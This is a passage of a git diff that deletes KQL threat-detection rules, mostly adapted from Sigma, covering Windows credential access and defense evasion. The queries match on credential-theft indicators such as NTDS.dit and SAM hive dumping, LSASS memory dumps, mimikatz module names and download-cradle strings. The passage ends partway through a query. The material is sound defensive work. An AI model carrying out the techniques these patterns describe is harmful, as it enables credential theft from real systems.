Access/Sensitive_File_Recovery_From_Backup_Via_Wbadmin.EXE.kql deleted file mode 100644 index b8e893e8..00000000 --- a/Credential Access/Sensitive_File_Recovery_From_Backup_Via_Wbadmin.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2024/05/10 -// Level: high -// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. -Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. - -// Tags: attack.credential_access, attack.t1003.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit") and (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") \ No newline at end of file diff --git a/Credential Access/Shadow_Copies_Creation_Using_Operating_Systems_Utilities.kql b/Credential Access/Shadow_Copies_Creation_Using_Operating_Systems_Utilities.kql deleted file mode 100644 index e9be73a7..00000000 --- a/Credential Access/Shadow_Copies_Creation_Using_Operating_Systems_Utilities.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community -// Date: 2019/10/22 -// Level: medium -// Description: Shadow Copies creation using operating systems utilities, possible credential access -// Tags: attack.credential_access, attack.t1003, attack.t1003.002, attack.t1003.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "shadow" and ProcessCommandLine contains "create") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE"))) \ No newline at end of file diff --git a/Credential Access/Suspicious_Active_Directory_Database_Snapshot_Via_ADExplorer.kql b/Credential Access/Suspicious_Active_Directory_Database_Snapshot_Via_ADExplorer.kql deleted file mode 100644 index 9babcb21..00000000 --- a/Credential Access/Suspicious_Active_Directory_Database_Snapshot_Via_ADExplorer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/14 -// Level: high -// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. -// Tags: attack.credential_access, attack.t1552.001, attack.t1003.003 -DeviceProcessEvents -| where ProcessCommandLine contains "snapshot" and (FolderPath endswith "\\ADExplorer.exe" or ProcessVersionInfoOriginalFileName =~ "AdExp") and (ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Windows\\Temp\\") \ No newline at end of file diff --git a/Credential Access/Suspicious_Dump64.exe_Execution.kql b/Credential Access/Suspicious_Dump64.exe_Execution.kql deleted file mode 100644 index 0f7d9a83..00000000 --- a/Credential Access/Suspicious_Dump64.exe_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Austin Songer @austinsonger, Florian Roth -// Date: 2021/11/26 -// Level: high -// Description: Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder -// Tags: attack.credential_access, attack.t1003.001 -DeviceProcessEvents -| where (FolderPath endswith "\\dump64.exe" and (not(FolderPath contains "\\Installer\\Feedback\\dump64.exe"))) or (FolderPath endswith "\\dump64.exe" and (ProcessCommandLine contains " -ma " or ProcessCommandLine contains "accepteula")) \ No newline at end of file diff --git a/Credential Access/Suspicious_File_Event_With_Teams_Objects.kql b/Credential Access/Suspicious_File_Event_With_Teams_Objects.kql deleted file mode 100644 index 564a514a..00000000 --- a/Credential Access/Suspicious_File_Event_With_Teams_Objects.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @SerkinValery -// Date: 2022/09/16 -// Level: high -// Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. -// Tags: attack.credential_access, attack.t1528 -DeviceFileEvents -| where (FolderPath contains "\\Microsoft\\Teams\\Cookies" or FolderPath contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe")) \ No newline at end of file diff --git a/Credential Access/Suspicious_Key_Manager_Access.kql b/Credential Access/Suspicious_Key_Manager_Access.kql deleted file mode 100644 index 4ccbd4ac..00000000 --- a/Credential Access/Suspicious_Key_Manager_Access.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/04/21 -// Level: high -// Description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager) -// Tags: attack.credential_access, attack.t1555.004 -DeviceProcessEvents -| where (ProcessCommandLine contains "keymgr" and ProcessCommandLine contains "KRShowKeyMgr") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/Credential Access/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql b/Credential Access/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql deleted file mode 100644 index df06d4d8..00000000 --- a/Credential Access/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Elastic (idea), Tobias Michalski (Nextron Systems) -// Date: 2022/05/04 -// Level: high -// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service -// Tags: attack.privilege_escalation, attack.credential_access, attack.t1212 -DeviceProcessEvents -| where ((ProcessCommandLine contains "spoolss" or ProcessCommandLine contains "srvsvc" or ProcessCommandLine contains "/print/pipe/") and (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine contains "http")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/Credential Access/Suspicious_Office_Token_Search_Via_CLI.kql b/Credential Access/Suspicious_Office_Token_Search_Via_CLI.kql deleted file mode 100644 index 230502e3..00000000 --- a/Credential Access/Suspicious_Office_Token_Search_Via_CLI.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/25 -// Level: medium -// Description: Detects possible search for office tokens via CLI by looking for the string "eyJ0eX". This string is used as an anchor to look for the start of the JWT token used by office and similar apps. -// Tags: attack.credential_access, attack.t1528 -DeviceProcessEvents -| where ProcessCommandLine contains "eyJ0eXAiOi" or ProcessCommandLine contains " eyJ0eX" or ProcessCommandLine contains " \"eyJ0eX\"" or ProcessCommandLine contains " 'eyJ0eX'" \ No newline at end of file diff --git a/Credential Access/Suspicious_PFX_File_Creation.kql b/Credential Access/Suspicious_PFX_File_Creation.kql deleted file mode 100644 index 882b9d15..00000000 --- a/Credential Access/Suspicious_PFX_File_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/05/02 -// Level: medium -// Description: A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file. -// Tags: attack.credential_access, attack.t1552.004 -DeviceFileEvents -| where FolderPath endswith ".pfx" and (not((FolderPath contains "\\Templates\\Windows\\Windows_TemporaryKey.pfx" and FolderPath contains "\\CMake\\"))) \ No newline at end of file diff --git a/Credential Access/Suspicious_Process_Patterns_NTDS.DIT_Exfil.kql b/Credential Access/Suspicious_Process_Patterns_NTDS.DIT_Exfil.kql deleted file mode 100644 index 88ae7640..00000000 --- a/Credential Access/Suspicious_Process_Patterns_NTDS.DIT_Exfil.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/11 -// Level: high -// Description: Detects suspicious process patterns used in NTDS.DIT exfiltration -// Tags: attack.credential_access, attack.t1003.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "ac i ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "/c copy " and ProcessCommandLine contains "\\windows\\ntds\\ntds.dit") or (ProcessCommandLine contains "activate instance ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "ntds.dit") or ((FolderPath endswith "\\NTDSDump.exe" or FolderPath endswith "\\NTDSDumpEx.exe") or (ProcessCommandLine contains "ntds.dit" and ProcessCommandLine contains "system.hiv") or ProcessCommandLine contains "NTDSgrab.ps1")) or (((InitiatingProcessFolderPath contains "\\apache" or InitiatingProcessFolderPath contains "\\tomcat" or InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\") or (FolderPath contains "\\apache" or FolderPath contains "\\tomcat" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Public\\" or FolderPath contains "\\PerfLogs\\")) and ProcessCommandLine contains "ntds.dit") \ No newline at end of file diff --git a/Credential Access/Suspicious_Reg_Add_Open_Command.kql b/Credential Access/Suspicious_Reg_Add_Open_Command.kql deleted file mode 100644 index 9ff5ebd0..00000000 --- a/Credential Access/Suspicious_Reg_Add_Open_Command.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/20 -// Level: medium -// Description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key -// Tags: attack.credential_access, attack.t1003 -DeviceProcessEvents -| where (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/ve " and ProcessCommandLine contains "/d") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "DelegateExecute") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings") \ No newline at end of file diff --git a/Credential Access/Suspicious_SYSTEM_User_Process_Creation.kql b/Credential Access/Suspicious_SYSTEM_User_Process_Creation.kql deleted file mode 100644 index 76673450..00000000 --- a/Credential Access/Suspicious_SYSTEM_User_Process_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords) -// Date: 2021/12/20 -// Level: high -// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) -// Tags: attack.credential_access, attack.defense_evasion, attack.privilege_escalation, attack.t1134, attack.t1003, attack.t1027 -DeviceProcessEvents -| where ((ProcessIntegrityLevel =~ "System" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\ping.exe") or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "net user "))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or ProcessCommandLine =~ "ping 127.0.0.1 -n 5" or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd")))) \ No newline at end of file diff --git a/Credential Access/Suspicious_SYSVOL_Domain_Group_Policy_Access.kql b/Credential Access/Suspicious_SYSVOL_Domain_Group_Policy_Access.kql deleted file mode 100644 index 5733d349..00000000 --- a/Credential Access/Suspicious_SYSVOL_Domain_Group_Policy_Access.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, Jonhnathan Ribeiro, oscd.community -// Date: 2018/04/09 -// Level: medium -// Description: Detects Access to Domain Group Policies stored in SYSVOL -// Tags: attack.credential_access, attack.t1552.006 -DeviceProcessEvents -| where ProcessCommandLine contains "\\SYSVOL\\" and ProcessCommandLine contains "\\policies\\" \ No newline at end of file diff --git a/Credential Access/Suspicious_Serv-U_Process_Pattern.kql b/Credential Access/Suspicious_Serv-U_Process_Pattern.kql deleted file mode 100644 index 2f0ddfb0..00000000 --- a/Credential Access/Suspicious_Serv-U_Process_Pattern.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/07/14 -// Level: high -// Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service -// Tags: attack.credential_access, attack.t1555, cve.2021.35211 -DeviceProcessEvents -| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe") and InitiatingProcessFolderPath endswith "\\Serv-U.exe" \ No newline at end of file diff --git a/Credential Access/Suspicious_Unattend.xml_File_Access.kql b/Credential Access/Suspicious_Unattend.xml_File_Access.kql deleted file mode 100644 index 4f10fd22..00000000 --- a/Credential Access/Suspicious_Unattend.xml_File_Access.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2021/12/19 -// Level: medium -// Description: Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. -If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process - -// Tags: attack.credential_access, attack.t1552.001 -DeviceFileEvents -| where FolderPath endswith "\\unattend.xml" \ No newline at end of file diff --git a/Credential Access/Suspicious_Usage_Of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql b/Credential Access/Suspicious_Usage_Of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql deleted file mode 100644 index 2de6740e..00000000 --- a/Credential Access/Suspicious_Usage_Of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/14 -// Level: medium -// Description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. -// Tags: attack.credential_access, attack.t1003.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "snapshot" and ProcessCommandLine contains "mount ") or (ProcessCommandLine contains "ac" and ProcessCommandLine contains " i" and ProcessCommandLine contains " ntds")) and (FolderPath endswith "\\ntdsutil.exe" or ProcessVersionInfoOriginalFileName =~ "ntdsutil.exe") \ No newline at end of file diff --git a/Credential Access/Time_Travel_Debugging_Utility_Usage.kql b/Credential Access/Time_Travel_Debugging_Utility_Usage.kql deleted file mode 100644 index 676604a5..00000000 --- a/Credential Access/Time_Travel_Debugging_Utility_Usage.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative -// Date: 2020/10/06 -// Level: high -// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. -// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\tttracer.exe" \ No newline at end of file diff --git a/Credential Access/Time_Travel_Debugging_Utility_Usage_-_Image.kql b/Credential Access/Time_Travel_Debugging_Utility_Usage_-_Image.kql deleted file mode 100644 index 856e72cb..00000000 --- a/Credential Access/Time_Travel_Debugging_Utility_Usage_-_Image.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative -// Date: 2020/10/06 -// Level: high -// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. -// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001 -DeviceImageLoadEvents -| where FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\ttdwriter.dll" or FolderPath endswith "\\ttdloader.dll" \ No newline at end of file diff --git a/Credential Access/Typical_HiveNightmare_SAM_File_Export.kql b/Credential Access/Typical_HiveNightmare_SAM_File_Export.kql deleted file mode 100644 index a1ad103b..00000000 --- a/Credential Access/Typical_HiveNightmare_SAM_File_Export.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/07/23 -// Level: high -// Description: Detects files written by the different tools that exploit HiveNightmare -// Tags: attack.credential_access, attack.t1552.001, cve.2021.36934 -DeviceFileEvents -| where (FolderPath contains "\\hive_sam_" or FolderPath contains "\\SAM-2021-" or FolderPath contains "\\SAM-2022-" or FolderPath contains "\\SAM-2023-" or FolderPath contains "\\SAM-haxx" or FolderPath contains "\\Sam.save") or FolderPath =~ "C:\\windows\\temp\\sam" \ No newline at end of file diff --git a/Credential Access/Uncommon_Outbound_Kerberos_Connection.kql b/Credential Access/Uncommon_Outbound_Kerberos_Connection.kql deleted file mode 100644 index 959bf177..00000000 --- a/Credential Access/Uncommon_Outbound_Kerberos_Connection.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Ilyas Ochkov, oscd.community -// Date: 2019/10/24 -// Level: medium -// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. - -// Tags: attack.credential_access, attack.t1558, attack.lateral_movement, attack.t1550.003 -DeviceNetworkEvents -| where RemotePort == 88 and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or InitiatingProcessFolderPath endswith "\\tomcat\\bin\\tomcat8.exe"))) \ No newline at end of file diff --git a/Credential Access/VolumeShadowCopy_Symlink_Creation_Via_Mklink.kql b/Credential Access/VolumeShadowCopy_Symlink_Creation_Via_Mklink.kql deleted file mode 100644 index 28c58e45..00000000 --- a/Credential Access/VolumeShadowCopy_Symlink_Creation_Via_Mklink.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov, oscd.community -// Date: 2019/10/22 -// Level: high -// Description: Shadow Copies storage symbolic link creation using operating systems utilities -// Tags: attack.credential_access, attack.t1003.002, attack.t1003.003 -DeviceProcessEvents -| where ProcessCommandLine contains "mklink" and ProcessCommandLine contains "HarddiskVolumeShadowCopy" \ No newline at end of file diff --git a/Credential Access/WerFault_LSASS_Process_Memory_Dump.kql b/Credential Access/WerFault_LSASS_Process_Memory_Dump.kql deleted file mode 100644 index 2afb8c5f..00000000 --- a/Credential Access/WerFault_LSASS_Process_Memory_Dump.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/06/27 -// Level: high -// Description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials -// Tags: attack.credential_access, attack.t1003.001 -DeviceFileEvents -| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\WerFault.exe" and (FolderPath contains "\\lsass" or FolderPath contains "lsass.exe") \ No newline at end of file diff --git a/Credential Access/Windows_Credential_Editor_Registry.kql b/Credential Access/Windows_Credential_Editor_Registry.kql deleted file mode 100644 index df152890..00000000 --- a/Credential Access/Windows_Credential_Editor_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/12/31 -// Level: critical -// Description: Detects the use of Windows Credential Editor (WCE) -// Tags: attack.credential_access, attack.t1003.001, attack.s0005 -DeviceRegistryEvents -| where RegistryKey contains "Services\\WCESERVICE\\Start" \ No newline at end of file diff --git a/Credential Access/Windows_Credential_Manager_Access_via_VaultCmd.kql b/Credential Access/Windows_Credential_Manager_Access_via_VaultCmd.kql deleted file mode 100644 index 823b25cd..00000000 --- a/Credential Access/Windows_Credential_Manager_Access_via_VaultCmd.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/04/08 -// Level: medium -// Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe -// Tags: attack.credential_access, attack.t1555.004 -DeviceProcessEvents -| where ProcessCommandLine contains "/listcreds:" and (FolderPath endswith "\\VaultCmd.exe" or ProcessVersionInfoOriginalFileName =~ "VAULTCMD.EXE") \ No newline at end of file diff --git a/Defense Evasion/ADS_Zone.Identifier_Deleted_By_Uncommon_Application.kql b/Defense Evasion/ADS_Zone.Identifier_Deleted_By_Uncommon_Application.kql deleted file mode 100644 index 5c77ac85..00000000 --- a/Defense Evasion/ADS_Zone.Identifier_Deleted_By_Uncommon_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/09/04 -// Level: medium -// Description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. -// Tags: attack.defense_evasion, attack.t1070.004 -DeviceFileEvents -| where FolderPath endswith ":Zone.Identifier" and (not((InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\explorer.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe"))))) \ No newline at end of file diff --git a/Defense Evasion/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql b/Defense Evasion/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql deleted file mode 100644 index 857eb759..00000000 --- a/Defense Evasion/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/17 -// Level: high -// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD") \ No newline at end of file diff --git a/Defense Evasion/Abusing_Print_Executable.kql b/Defense Evasion/Abusing_Print_Executable.kql deleted file mode 100644 index a62f50b9..00000000 --- a/Defense Evasion/Abusing_Print_Executable.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative -// Date: 2020/10/05 -// Level: medium -// Description: Attackers can use print.exe for remote file copy -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ((ProcessCommandLine contains "/D" and ProcessCommandLine contains ".exe") and ProcessCommandLine startswith "print" and FolderPath endswith "\\print.exe") and (not(ProcessCommandLine contains "print.exe")) \ No newline at end of file diff --git a/Defense Evasion/Access_To_Windows_Outlook_Mail_Files_By_Uncommon_Application.kql b/Defense Evasion/Access_To_Windows_Outlook_Mail_Files_By_Uncommon_Application.kql deleted file mode 100644 index 3969c5ac..00000000 --- a/Defense Evasion/Access_To_Windows_Outlook_Mail_Files_By_Uncommon_Application.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2024/05/10 -// Level: low -// Description: Detects file access requests to Windows Outlook Mail by uncommon processes. -Could indicate potential attempt of credential stealing. -Requires heavy baselining before usage - -// Tags: attack.t1070.008, attack.defense_evasion -DeviceFileEvents -| where (FileName contains "\\AppData\\Local\\Comms\\Unistore\\data" or FileName endswith "\\AppData\\Local\\Comms\\UnistoreDB\\store.vol") and (not(((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\" and (InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe")) or (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Activate_Suppression_of_Windows_Security_Center_Notifications.kql b/Defense Evasion/Activate_Suppression_of_Windows_Security_Center_Notifications.kql deleted file mode 100644 index 6a5eaf90..00000000 --- a/Defense Evasion/Activate_Suppression_of_Windows_Security_Center_Notifications.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/08/19 -// Level: medium -// Description: Detect set Notification_Suppress to 1 to disable the Windows security center notification -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress" \ No newline at end of file diff --git a/Defense Evasion/Add_DisallowRun_Execution_to_Registry.kql b/Defense Evasion/Add_DisallowRun_Execution_to_Registry.kql deleted file mode 100644 index 9a560793..00000000 --- a/Defense Evasion/Add_DisallowRun_Execution_to_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/08/19 -// Level: medium -// Description: Detect set DisallowRun to 1 to prevent user running specific computer program -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun" \ No newline at end of file diff --git a/Defense Evasion/Add_Insecure_Download_Source_To_Winget.kql b/Defense Evasion/Add_Insecure_Download_Source_To_Winget.kql deleted file mode 100644 index 65afca78..00000000 --- a/Defense Evasion/Add_Insecure_Download_Source_To_Winget.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/17 -// Level: high -// Description: Detects usage of winget to add a new insecure (http) download source. -Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos) - -// Tags: attack.defense_evasion, attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add " and ProcessCommandLine contains "http://") and 